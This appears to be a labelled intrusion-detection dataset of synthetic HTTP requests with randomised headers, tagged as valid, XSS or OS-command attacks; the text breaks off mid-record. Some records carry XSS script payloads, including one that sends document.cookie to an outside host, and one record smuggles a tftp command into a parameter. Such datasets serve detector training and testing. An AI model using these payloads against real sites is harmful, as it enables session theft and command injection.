GET /tIb/53.pKVQ9egXP.htm?iiugaoshvvt=wp-+0d&iet5eroanwo=ec5kl&fit@1dX0qFE=leG7udnumr&documentYRjpX-y=%3En&ei2aehpu=pXmK&nhe=S6it5wel%3C+%5CMoeohm&ekbthsezihjil=22&iRnoeskdef6re=e4T0vMx8bU&0cAu3Ykartn=ofdillah1oi4nn&dt1mcbemgtSix=mEnrhmiwhere HTTP/1.1
Host: 113.176.71.1
Connection: epdtSrrq
Accept: */*;q=0.1
Accept-Charset: windows-1250;q=0.4, cp-932;q=0.3, iso-8859-3
Accept-Encoding: deflate, gzip, compress
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 29.47.242.107
Cookie: locationifO1OhftpNl=97
Cookie2: $Version="925"
Date: Tue, 05 Aug 08 08:30:11 GMT
ETag: "37Du@YuAnBeW63f@"
Expect: 100-continue
From: ma7sea1@tueds.com
If-Modified-Since: Sun, 15 May 05 05:53:22 UTC
If-Unmodified-Since: Sat, 20 Jun 09 22:13:17 CET
If-Match: "lbIocqcWTofIKSejQ"
If-None-Match: *
If-Range: *
Max-Forwards: 3882
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: npwt Loartcsg=sdhi
Authorization: fEmdbm dorbepd=t9neh
Range: 0-,-74494,959420-8
Referer: /i6kdai.msf
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.3 (compatible; Konqueror/1.3; Linux i586; 3ivs6sac)
UA-CPU: 68000
UA-Disp: 528,194,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 470x7016
Via: HTTP/8.6 www.hiaaar.shtml
Transfer-Encoding: identity
Upgrade: asoetw/7.0
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 156.117.248.41
X-Serial-Number: 21316010619533
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10030
Start - Id: 24204
class: Valid
GET /aC2o/fduorztseaianrl/xwindow.open9nOyOdivW9Tu/oQQla6QAyi/lBR/swntj5ncbn/SV_ncQ-HXljRx.php3?Iywh9HH3=eJQ&sOAWOyebIe=rY1&X8yudnc@ZQE=uZj3G&cemtEHiheoyr=eeHpeq&cban=fezj&13ftiI=oidItnacceptideletebeeut&wdegyuaA=h20aoozood%2Fytl&st7tvtlAeepi8s=650 HTTP/1.1
Host: www.Orkmapra.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: t2su6Nt-oj8mrcB, pnexnaqs-2eo, Rs39q-sit;q=0.6, l-te, R-l4ntet;q=0.7
Cache-Control: eSvd=mihx
Client-ip: 73.48.106.4
Cookie: batqhierAsg4vey=OEgsgo3oaoclgdn
Cookie2: $Version="564"
Date: Thu, 13 Oct 05 23:37:00 CET
ETag: W/"d4RMo3ppA5gVFGw"
Expect: 100-continue
From: vktxen@eejuti.biz
If-Modified-Since: Fri, 14 Jul 06 01:01:36 UTC
If-Unmodified-Since: Fri, 05 Sep 08 07:15:13 UTC
If-Match: "JtO_jpn-k2kO7.y5e"
If-None-Match: *
If-Range: Sun, 02 Nov 08 02:42:58 GMT
Max-Forwards: 98
MIME-Version: 5.0
Pragma: a2='nofkenT'
Proxy-Authorization: Iccdm brwetH=oa0t
Authorization: Basic NWxvZWFmZTpkem5J
Range: 497-0048,6-
Referer: http://www.1ebqe.cz/rsld/bbrsne/fRslno/ciiejh/adsat.swf
TE: gzip;q=0.3
Trailer: Warning
User-Agent: Mozilla/4.0 (Windows; U; Windows NT 7.3; ts-sk; rv:5.6.4) Gecko/18956043
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 146x610
Via: FTP/0.0 101.162.88.118, FTP/0.2 142.39.65.104:012
Transfer-Encoding: deflate
Upgrade: syof/8.8, rsea/3.0, gel/1.4
Warning: 155 147.225.115.94 "lnnt" 
X-Forwarded-For: 254.110.118.39
X-Serial-Number: 42275938447231485
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24204
Start - Id: 3993
class: Valid
PUT /to7_Kb5.Rl83szq1lC/8tsoealfqdbCa/Zyx30/cuupIi7Ab.X/inbce2/i2ttk7lAtws/amnnihwr5i9xOw/4ECAWmj.aBCN/hxOpWd/nscj3wiC8JYfD3K8B/iemdhnllt4ehaonezSe.php3? HTTP/1.0
Content-Length: 40
Content-Language: hhe,iinrhrgj
Content-Encoding: identity
Content-Location: /Nf1ha/udplnn/seent.exe
Content-MD5: dGlTMWhlb2FzcnJyRnZpYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Apr 06 06:59:52 CET
Last-Modified: Tue, 14 Jun 05 21:50:09 UTC
Host: 253.88.129.197:80
Connection: cNRi
Accept: text/plain;q=0.2, application/rtf
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rwtl-laonlw;q=0.9, 2ratts-re6lt, initieu-6Dmroq
Cache-Control: max-age=735
Client-ip: 104.56.203.97
Cookie: tlomze=e ;wrm53AR=8;meixe=e;tm=nkTi0f;R5drsinasm=aoche2siagy8ifn4;ed0x6r3bayewo=6e-8@2mNrv
Cookie2: $Version="22"
Date: Tue, 17 Nov 09 02:42:03 UTC
ETag: "eiWn0tPL6IJ-5YX"
Expect: ehypnlv=tatcoeF;ao0us5
From: mdue@xtsaa.biz
If-Modified-Since: Tue, 14 Jun 05 16:31:29 CET
If-Unmodified-Since: Sun, 03 Feb 08 14:07:12 CET
If-Match: *
If-None-Match: "aIBQLMWbJF.JpLNs."
If-Range: *
Max-Forwards: 62
MIME-Version: 6.0
Pragma: Rlr=ltYn
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: Digest response="7abC1bF906d7Cd663A940E2FDC6F2f0F"
Range: -9547,5300-11,-55
Referer: /e7edat/oustn/ibaE.mpeg
TE: trailers,chunked;q=0.2
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.5 (Windows; U; Win 9x 5.3; e5-Mn; rv:9.8.3) Gecko/69469670
UA-CPU: Sparc
UA-Disp: 055,684,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 881x617
Via: 1tzw/1.4 87.56.100.224
Transfer-Encoding: deflate
Upgrade: oefTul/8.6, 0Euin/6.0, n5h/9.8, ghe/7.4, n3n48/3.1
Warning: 442 www.azjbyn.gif "uhemezissofcc" "Sun, 09 Sep 07 08:19:07 GMT"
X-Forwarded-For: 189.95.227.203
X-Serial-Number: 40666
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

WLa0= tmpperlhe&65f8sN=le]cwq5deetcgcw

End - Id: 3993
Start - Id: 46991
class: XSS
GET /tqJHr6ftASdAs_E/mocha7/oPe/eI4D@t@IJYT/oPK6B/sbLe8cht/eeu/tJQz/hvMEoVUyw/4Bsvh6pkMbt7P/7wmGmocha_DPn_wz5/locationcbGcoacceptHWLinputhndt.gif?tepap=e9esuAs3jhe2lo&hDXtelnetPrGwK=t3iP0%409v&tceladfddhdndnl=%3C%3Cscript+%3E%5Balert+%28%27prdc8E%27%29%3B%5D%3C%2Fscript++++%3E&tttll1=4seiO&4usrautoexecHD2.4aBf=5056&teuEoesie5cen9=nnuBH5Cc&atesety7ezomese=mna&lctnwWD0edr0wo=cpEaw&AlaiRtekrsYnoJl=cNs&rtifen=tpjn8z3GTC&nr0Eqo=fYXV1i&eetnaHanarszdr=91579 HTTP/1.0
Host: 81.130.136.25:546
Connection: tpnLy
Accept: image/*;q=0.2, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lem6zeL-bohl;q=0.2, pLir-au2e7E;q=0.8, nsnrx6-Piripd
Cache-Control: max-stale
Client-ip: 0.51.121.220
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Tue, 28 Nov 06 14:22:54 CET
ETag: "f-DBP8aMNHaaIY12Y"
Expect: 3vtn=oa9Wm;sdoo2=dbcNoIu8
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Sun, 22 May 05 19:28:50 CET
If-Unmodified-Since: Wed, 05 Nov 08 03:18:00 UTC
If-Match: "v7bhnFPjZJoYNz5Ci"
If-None-Match: *
If-Range: "DzDJpdX@FFDYvvts"
Max-Forwards: 4642
MIME-Version: 0.5
Pragma: xnS8Cen='f'
Proxy-Authorization: Digest uri=/ysiep/bnfrz/aTcermnr.mpeg
Authorization: oiii irge1a=Lktise
Range: 5-22964
Referer: /tsEAa/zmeeosdl/goid/j6ecnh/mne2a.dll
TE: trailers
Trailer: Upgrade
User-Agent: nkafYedsvisjclcoyeoh
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: 5.1 123.166.64.21, 6.1 www.owbem.shtml
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 758 www.hjnzhm8.html "jrtkbu" "Sat, 29 Mar 08 09:44:57 GMT"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46991
Start - Id: 47063
class: XSS
GET /htdtamehBiSaaeeanmpr/dss9m32nstqssk3/ea/tQswjPJ8Bs-/zgPK/24hQC/ttWnuMyQ-4K/acMRrwyd1yODN/ek.de1l/Rntdpeqhf/h22PPKVtXHDbjwRZ-47d/unacftl.asp?rboIl3nro3di=%3Cbody++onload+++%3D+%22++%5Balert++++%28%27pjor1tlbtq%27%29%3B%5D+++%22++++%3E&Pchb3th=rirson7wSai6e3 HTTP/1.1
Host: www.lt9hp.gov
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=131
Client-ip: 127.63.46.215
Cookie: j3saot=oocxsnSisohn3T
Cookie2: $Version="08"
Date: Wed, 03 Sep 08 07:11:20 CET
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: upMalngr@beooie.cz
If-Modified-Since: Tue, 21 Mar 06 15:13:26 CET
If-Unmodified-Since: Mon, 18 Jan 10 24:41:25 UTC
If-Match: "h4JzSI9EN93fI6G58g"
If-None-Match: *
If-Range: "@7zCEbRjjE36qvoYnh"
Max-Forwards: 744
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 53-8432
Referer: /seRE/alobsnh/ndr1rn/uigenti.php3
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/9.2 (Windows; U; Win98 9.5; uN-Ai; rv:2.1.7) Gecko/01172639
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 6.8 www.yxar.jpeg, 7.7 123.64.215.33
Transfer-Encoding: identity
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47063
Start - Id: 44618
class: OsCommanding
GET /uusrTl82tPisditeu/cZa.BK-dygTOhq/gh/egnxfde4n9h6da/bkQbRrtuwntbthCo/@I.J/6AhuoSa/im-Ew-.MNs695/mareh2fruln4iojyw.gif?utsaoar9mnsic5=i3m&anr2nOmehoiedod=0ntmpjsrL%25Me&ilnorreaKnassd=r%40jP9of8.SCS&enlcainx=5i%40%24&rpv4Heo=72&iaaalhpFte6=22.232.198.140+++%3B++++tftp+192.168.10.33+test.txt HTTP/1.1
Host: 181.175.218.111
Connection: close
Accept: application/zip, image/png
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Cookie2: $Version="361"
Date: Thu, 14 Jun 07 13:22:28 CET
ETag: W/"gkaNyei91XNxgaZu"
If-None-Match: *
Pragma: hpoeua=ett8neoe
Authorization: Basic OXM2eW5yOnVKbXQ1bkly
Referer: http://www.6drb8n.uk/dlmgh.zip
User-Agent: Mozilla/8.5 (compatible; zbbsUPttc; Win 9x; mhswTnf; niamhqeSon)

null

End - Id: 44618
Start - Id: 10239
class: Valid
GET /lM_f3iXNch/BQ/lD2me6p27z/et/eDttei/oeoAwuK/dQ4xu.html?reelqse2esrt=4593 HTTP/1.0
Host: 118.39.104.252:0869
Connection: ahnifr
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress;q=0.3, deflate, identity;q=0.6
Accept-Language: *
Cache-Control: ok='BaSe'
Client-ip: 242.45.255.170
Cookie: wt1e=840286073;nsue=Qs
Cookie2: $Version="7"
Date: Wed, 22 Oct 08 16:57:30 UTC
ETag: "IpOAWUkT6We5EdxB@p"
Expect: 100-continue
From: 8ats@arc0sedxjc.net
If-Modified-Since: Mon, 11 Oct 04 05:33:43 UTC
If-Unmodified-Since: Mon, 30 Jul 07 23:55:41 GMT
If-Match: *
If-None-Match: "nQ0zqvkYYr0d9U5"
If-Range: Tue, 03 Feb 09 03:09:33 GMT
Max-Forwards: 184
MIME-Version: 2.0
Pragma: aysP7h=eaeflbe
Proxy-Authorization: Digest response="09D35458eFFCF6eeB6ECbdFBEAdD11C5"
Authorization: NTLM dDlicDJpdG5nZWZzN3JCZWVmenB0NG4zbmhBanNlaWNm
Range: 48806-,859-40,-983
Referer: /iFlh5eaB/lodzew/Qw4pt9c/nn4ln/d9edlTgm.jpeg
TE: chunked,gzip,deflate
Trailer: Via
User-Agent: Mozilla/9.5 (Windows; U; Windows NT 8.5; ph-EU; rv:1.4.5) Gecko/44439467
UA-CPU: PowerPC
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 090x474
Via: HTTP/4.1 www.hwehnt.shtml:051, HTTP/6.5 www.tonuTdn0.gif, 3.1 109.218.162.124
Transfer-Encoding: identity
Upgrade: e34/2.8, srytrj/3.4, igIE5/7.9, eidtoe/3.9, xiv8g/0.2
Warning: 543 www.ocsh.htm "tc9yeg9eae" 
X-Forwarded-For: 143.110.205.106
X-Serial-Number: 56021671448691274221
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10239
Start - Id: 559
class: Valid
GET /tu8U7f-K.C.PutqjN/wxk3RPtyl92gu/tOYOnPc2T8/sdjo19ti/tth4gNtnfbso/ev1QTO5QPSW.E22T/es2tD95CQXUMO-.css?oeTz8q=iilsi0ettlrqaOelf&noseUaLTlyE=oav%40%7Ebh%3DddR3t01tnetcatsxml&rardtpDmtwstlo=t%3Eztmwoetlehl+a&ysioe6drihf=aaw&c0iGeeeatfb=299&Ngtaocraemtlo=pK4gIPc&Pitnnl26s=75385100&0@jeR6HDAh=tt&fileesol=9174292&4n1e=mn&rsmdAabtnoi=348&gt9ntuY1riGodno=tU%7Cocwba%3Ban&reneg=SLexaedoptq%3Ct&pdLAchildIOlinkbqE=0929&QJN9lHbetween=aBos HTTP/1.1
Host: 78.171.187.63:743
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-turkish
Accept-Encoding: deflate;q=0.9, gzip;q=0.0, deflate, compress;q=0.2
Accept-Language: eerzSnhp-s;q=0.4, ai4ee-iion, h-aieeeEd, tJgp-5dsroer5;q=0.2
Cache-Control: no-store
Client-ip: 160.201.138.49
Cookie: 5b=vP/fo;lEltb=uMhioy;APdaOB726=ni s10aLo;nxye=aoa
Cookie2: $Version="404"
Date: Mon, 17 Jul 06 13:09:57 CET
ETag: W/"5xpbG-UXNwHRSDSjHd"
Expect: 8mlnolre=hrua
From: bss0NyZ@igoc.st
If-Modified-Since: Sat, 27 Nov 04 22:07:34 GMT
If-Unmodified-Since: Sat, 03 Mar 07 20:36:43 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Apr 08 10:05:53 GMT
Max-Forwards: 18
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic N2dtVGFzOjh4cnRw
Authorization: Basic MjlkdDp0b21u
Range: 5753-
Referer: http://www.anho.ch/ngNbM/Hm8el5kj/rian.gif
TE: deflate,chunked;q=0.2,trailers
Trailer: If-Range
User-Agent: Mozilla/7.7 (X11; U; Open BSD i586 8.9; ap-ae; rv:4.6.0) Gecko/95362626
UA-CPU: MIPS
UA-Disp: 0490,641,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 275x6652
Via: 3.0 www.eYede.jpeg, 6.4 www.laonlm.html, 0.5 79.60.131.161
Transfer-Encoding: compress
Upgrade: tth/7.2, dia/5.2, 17ohEa/5.1, dn2/4.0, lsaabo/1.1
Warning: 655 www.hgTeio.jpeg "sik3YytdKm" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 602347866565729
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 559
Start - Id: 8254
class: Valid
GET /uSJce3n/tna@NbNuJ/oiFNaC@FxNIW4mt2v/T83V8nyall6wherehM/sq/OLihl1odnorc5tyafmsi/Zbd971AWWeAcpassthruo/o9sNhniwVlr1vISkw.E/wapHLUf0l.js?Sj=gLie&nDRmoyn=rltthGialrm&qan=1&rfIuklenbt=8256686&8pnnecene8wojv=a1Mr1&tsrld=41&swptatchra=tAt%7Es%27t&m5pr=Dnc9vpeN&mhrste=eAi&TeERrroeaK=lep%29edufinr HTTP/1.0
Host: 31.197.47.166:183
Connection: close
Accept: */*;q=0.6
Accept-Charset: koi8, windows-1252;q=0.9, windows-1255;q=0.8, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=348
Client-ip: 69.142.224.48
Cookie: hn=b_FKJEvRVXm;hzrctu=mDvPpbS
Cookie2: $Version="7"
Date: Fri, 18 Jan 08 24:36:43 CET
ETag: "zpMrKI-Yg3pbzqkpI9"
Expect: 100-continue
From: esmrIye3@Rpha.st
If-Modified-Since: Thu, 21 Sep 06 23:32:42 CET
If-Unmodified-Since: Wed, 15 Dec 04 02:05:04 UTC
If-Match: "AdUrL5OgOPFEebemu7A"
If-None-Match: *
If-Range: Mon, 07 Aug 06 18:01:13 GMT
Max-Forwards: 4
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic ZWQ2M3Q6ZWlsYw==
Authorization: e95b 1gaeo=edTego
Range: 62861-,40-66
Referer: http://Autqih.it/othchie/diqs8g.pl
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: dtlhayga
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 833x678
Via: 3.6 www.rtbulte.css
Transfer-Encoding: bamla; eitavm=yitoirdf
Upgrade: rht7s7/2.6, dxceec/0.8, Fr2jv/6.2
Warning: 897 57.4.236.133 "et6uaeoa1dlo" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 7220629
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8254
Start - Id: 2256
class: Valid
GET /b9/imgdk2Kc/rfdoEcihHh2/ys7sv1ll/ototl1nesiy/@dvbdp30/ffEO4fESlVp./2GIYkOBUmYj4hZ/rwezbewowrooseetdTtc/s@5.html?eEw1=jaSwbeth8o%2Beya HTTP/1.0
Host: www.iado.be:80
Connection: keep-alive
Accept: video/*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=8530
Client-ip: 193.18.231.129
Cookie: ss=o;eTE=atndyhea<
Cookie2: $Version="557"
Date: Tue, 06 Apr 04 24:50:00 CET
ETag: "4Uvsr6@nPXyx8bbanB"
Expect: 100-continue
From: oniNcb@l92ecsed.it
If-Modified-Since: Sun, 07 Mar 10 01:43:45 UTC
If-Unmodified-Since: Thu, 17 Mar 05 04:10:58 UTC
If-Match: *
If-None-Match: "tf75mJ2VhY8oJf8"
If-Range: "r5515r84FqOfsS0FwI"
Max-Forwards: 76
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest username="hheA"
Authorization: NTLM M2luZG9kaWU4d29hZWl1YWdtZXNnMWVyc2l6czl6b2xhRGpvc1Rz
Range: -60,-7
Referer: http://ot7Rcnn.org/fanetew/scnb/gmeEAno/thaa0dit.jsp
TE: trailers,chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/0.7 (Windows; U; Win 9x 6.2; ns-3e; rv:8.2.6) Gecko/53900283
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2256x733
Via: 5.0 www.eaiva.jpeg:5
Transfer-Encoding: compress
Upgrade: l6b/8.2, ddjs/1.0, EPneim/9.5, cHY/2.6
Warning: 141 102.221.143.25:60740 "vgrreunklthugbStknar" 
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 61486796053346804
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2256
Start - Id: 46868
class: XSS
PUT /frfyhaetuentaa/vavnirtUroyrlr6tq/mTCz/idjB.NwM/SORFhstslecrra/fTv.PM_GT/tlmEuaQsjI/6rtau3sbth7pjrnc.tiff? HTTP/1.0
Content-Length: 255
Content-Language: glr
Content-Encoding: compress
Content-Location: /ioohpohr.zip
Content-MD5: dGZxQW9odGUzZ0lmMGthcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Apr 09 06:58:40 GMT
Last-Modified: Wed, 20 Jul 05 02:58:45 UTC
Host: www.7tyrwe.de:3
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, compress, identity;q=0.6, gzip;q=0.5, deflate
Accept-Language: Ran-Riio4o;q=0.0, 6Aalna-e;q=0.3, tratuji-Hi;q=0.8
Cache-Control: only-if-cached
Client-ip: 216.41.147.0
Cookie: nmaiaol1tn=7365;seen=t;kue9i=nSfsCqgjG
Cookie2: $Version="85"
Date: Wed, 21 Sep 05 14:58:08 UTC
ETag: "ynNtDqxUiypefBzDU"
Expect: 100-continue
From: xorersew@0i1thu.fr
If-Modified-Since: Tue, 03 Feb 04 16:38:02 CET
If-Unmodified-Since: Fri, 08 Apr 05 02:04:25 UTC
If-Match: *
If-None-Match: "Z_2PyHiv3JhHR73_N"
If-Range: Thu, 10 Jan 08 13:10:37 CET
Max-Forwards: 128
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest uri=/ioptabs/frdsoAN/sEhe7/Ittfram8.mpg
Range: 6262-,10870-70169
Referer: /3egettt/ettlc/uytgo/eywIb/e0sns.msf
TE: deflate,gzip;q=0.3
Trailer: Range
User-Agent: Mozilla/8.8 (compatible; MSIE 4.7; Windows NT; ptiI; elpwtgup)
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: HTTP/9.0 www.eamt.htm
Transfer-Encoding: efR9; rqiaeLh=Thnnow3
Upgrade: Btglc/3.9, rreo/8.4
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

3o1pe1=cRJ&NreltHdoeolfdw=<meta     http-equiv =   "  refresh    "   content   =    " 0;url=javascript:   [document.location.replace  ('http://www.etesnsal.com/cgi-bin/aretstra.cgi'+document.cookie);]    " >

End - Id: 46868
Start - Id: 31845
class: Valid
GET /f7oP2HCFtaQ/ey@/jeIs8n3mplruu3djo/nRiltsdls2/lo1_9es3y7czehPX0EcC/Pattbts26aadEelhh/8yZQWOVBqQ@@bgV2/passwd3YP_kwKmJH/oi6zphr/hahMhS/eVj01/gizilae2saaee.msf?neaodMutcdieoi=78293677&tiihnurps5fL3=e&fHfathvR=Ori%24%3Dnu%2Bidr6mua&b2jn.fEK5_=7572159&ekravsteeqSee=72962870&2d3tecep4ra=7871&dTEwdrs=geusrtas+t%3Er%26r%5Dxp_&tiwsn=aphp%3Afs%2F&gtdzt5=738&btta1al4aisnP=qoFd&ai4ln8=inbOwn&Dnc=85264 HTTP/1.1
Host: www.uohtecef.biz:26
Connection: keep-alive
Accept: text/xml;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: ts-ftx
Cache-Control: no-store
Client-ip: 239.40.123.252
Cookie: HToOotIepn=hoid~xeEiZ%weh;nodeEKlFt0A1=ib;TN=9884850569;9JGFDZF1x=3hoVe>rncad
Cookie2: $Version="885"
Date: Tue, 16 Mar 04 24:22:45 GMT
ETag: W/"gde8Dk70UHJfStlf"
Expect: 100-continue
From: tte0c@9tOsemgp.be
If-Modified-Since: Mon, 29 Mar 04 06:12:32 UTC
If-Unmodified-Since: Sat, 22 Nov 08 04:25:51 CET
If-Match: *
If-None-Match: "JpVHuOypr5xz7R7G"
If-Range: Fri, 28 Apr 06 24:18:44 UTC
Max-Forwards: 2
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM TzB5dXJPcklpZG5lZXR0YzJ0OXczZXNucTh0bXRhZW5Rcm5tYTJ0ZHN0eHVpaQ==
Authorization: Digest qop=auth
Range: -86
Referer: /btur/thTg/8OesEe/echivis/rltevsa.mspx
TE: gzip;q=0.2
Trailer: Trailer
User-Agent: Mozilla/1.9 (Windows; U; Win98 6.5; ht-ev; rv:2.4.4) Gecko/44068732
UA-CPU: x86
UA-Disp: 753,4459,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2241x014
Via: HTTP/2.5 13.198.225.135, HTTP/0.7 www.5nrs3d.html, 8.5 155.182.134.119
Transfer-Encoding: gzip
Upgrade: emhps/3.5, Steh/4.0, aieted/4.2, iro9te/2.8, are/6.4
Warning: 646 www.te98Thcn.htm "7aNme" "Fri, 30 Jun 06 06:54:15 CET"
X-Forwarded-For: 236.36.151.129
X-Serial-Number: 69375200108238652611
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31845
Start - Id: 18431
class: Valid
GET /cU52vif/ue7hanfJflrirdheg/Ieaqzof/ZRnmW8zoT9FWt/zMVVq/stit6e/gKW0n5QMs6L/wttno.php4? HTTP/1.1
Host: 156.124.165.87
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-5, shift_jis;q=0.3
Accept-Encoding: 
Accept-Language: lbelsj9-Edymn;q=0.4
Cache-Control: only-if-cached
Client-ip: 162.147.121.33
Cookie: r2rktInf=45270568;oe9gptTeeaafaet=thliket;owadt=lahslareorr2o;eef=7759;cxaemeyenistet=6adFhozoertelh0;yrtew=6388
Cookie2: $Version="12"
Date: Sat, 03 Nov 07 23:33:48 CET
ETag: "v-EN3eDfceKAwK7tP"
Expect: iftEr5=soa9fL;oik4z=Suya
From: sen0esya@3Yt7.ch
If-Modified-Since: Thu, 22 Feb 07 21:12:34 CET
If-Unmodified-Since: Fri, 06 May 05 23:58:00 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 27 May 04 24:50:56 UTC
Max-Forwards: 52
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic dzZoYW9kOmV0bmUzYWU=
Authorization: Digest qop=auth
Range: -60009,9764-84,879-
Referer: http://www.fpe7c.de/ottu.mp3
TE: trailers,deflate,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: iDXqnuJ7 http://www.8aate.it
UA-CPU: Sparc
UA-Disp: 3029,548,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 564x888
Via: HTTP/5.7 234.97.116.25
Transfer-Encoding: wscprq; h2artB=ae9te6w
Upgrade: er0ua/3.6
Warning: 824 www.ylebn.jpg "dloi" "Mon, 26 Apr 10 20:52:51 CET"
X-Forwarded-For: 94.17.82.121
X-Serial-Number: 562102259881666351
----: -----------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 18431
Start - Id: 15572
class: Valid
GET /gumwget7.VE0passthruFQU/rlzoaLlcsnkte2/ct5he/nsbgsound0NE1id/THGqA/xtermmetaoS_E/eidshitantriho/e2Z9qQdivLDy/binwPRTbetweenivE9Eq/hwEhrDdu5ptssoCaordn/eyWnm9233.PWFPPc/h8Ni7WUMx3OA7f2hU8..css?lgnna=nph-hhrh3je&nnH=tftaNqostm8sna&inoqSTvdiali=swaupx&8hrta=838109540&ketnieHne8ee7e=rw+0&X9telnetHJ=bpiFMpdfds HTTP/1.1
Host: www.oPnritthsr.net
Connection: 1t18adlc
Accept: */*
Accept-Charset: euc-kr;q=0.2, iso-8859-1
Accept-Encoding: *
Accept-Language: anb1d-i5;q=0.1, hh-c, 2pr-a, auh3il-aes0;q=0.1, tzeoLh-as
Cache-Control: max-age=03
Client-ip: 43.215.22.138
Cookie: epegtspeBton=5582116;datdla1d=dAiZepTmlD;8bht=31;orua7ae0tSElaoT=yNL_Ee
Cookie2: $Version="03"
Date: Sat, 01 Aug 09 16:20:23 GMT
ETag: "mNbVp5ZBEarBgcSmY"
Expect: 100-continue
From: Ftobr@eibao.net
If-Modified-Since: Sat, 20 Jun 09 22:04:05 UTC
If-Unmodified-Since: Mon, 31 Oct 05 19:18:48 UTC
If-Match: "74YEt14B18yyxS6"
If-None-Match: *
If-Range: Fri, 01 Jul 05 09:01:08 UTC
Max-Forwards: 9
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest realm
